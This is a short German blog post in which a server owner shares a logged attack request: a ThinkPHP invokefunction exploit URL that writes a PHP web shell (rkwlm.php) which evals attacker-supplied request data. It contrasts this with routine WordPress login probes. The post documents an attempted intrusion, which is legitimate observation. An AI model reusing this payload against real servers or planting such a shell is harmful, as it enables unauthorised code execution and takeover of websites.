Das ist ein netter PHP-basierender Angriff, der grade auf meinen Webserver versucht wurde
http://blog.fdik.org/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]= file_put_contents&vars[1][]=rkwlm.php&vars[1][]=<?php class CustomExecutor { public function __construct($code){ @eval(\\"/*CustomCodeExecutor*/\\" . $code); } } new CustomExecutor($_REQUEST['50']); ?>xinghuoxise$"
Das ist mal etwas anderes als das ewige
GET /cswl/index.php?c=login GET /xmlrpc.php GET /wp-login.php
Natürlich ist auf meinem Server kein PHP installiert. Aber das ist schön direkt ;-) Vermutlich funktioniert es bei den meisten, wo es eine rkwlm.php
gibt. Und sind noch weitere nette Sachen aus Hong Kong dabei ;-)